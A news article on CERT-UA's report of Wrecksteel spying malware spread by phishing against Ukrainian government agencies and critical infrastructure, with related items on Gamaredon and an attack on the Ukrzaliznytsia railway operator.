Ukraine recorded at least three cyberattacks in March targeting government agencies and critical infrastructure with new spying malware.

The attacks were carried out using previously unknown malware — dubbed Wrecksteel — deployed through phishing emails, according to a report released on Thursday by Ukraine’s computer emergency response team (CERT-UA).

The hackers used compromised accounts to send messages containing links to public file-sharing services such as DropMeFiles and Google Drive. When opened, the links executed a PowerShell script, enabling attackers to extract text documents, PDFs, images, and presentations, as well as take screenshots of infected devices.

CERT-UA, which named the hacking group UAC-0219, said the cyberespionage campaign has been active since at least the fall of 2024. 

In one incident, attackers sent phishing emails falsely claiming that a Ukrainian government agency planned to cut salaries. The email contained a malicious link purportedly leading to a list of affected employees.

While CERT-UA did not attribute the attacks to a specific country, most phishing-based espionage campaigns targeting Ukrainian government institutions originate from Russia.

Earlier this week, researchers at the cybersecurity firm Cisco Talos reported that a Russian-backed hacking group, Gamaredon, has been conducting an espionage campaign using malicious files referencing troop movements in Ukraine. The campaign was attributed to Russian intelligence services.

Ukraine’s state railway operator, Ukrzaliznytsia, suffered a major cyberattack last week that disrupted its online systems. Ukrainian cyber officials said the hackers deployed custom-built malware specifically designed for the railway’s infrastructure, suggesting the operation required significant resources and planning.

Authorities called the cyberattack on the operator, which serves millions of Ukrainians, “an act of terrorism.” 

Given the similarities between the tactics used in the operation against Ukrzaliznytsia and previous Russian-linked cyber activities, Ukraine suggested Russia was behind the campaign but did not attribute the attack to a specific hacker group.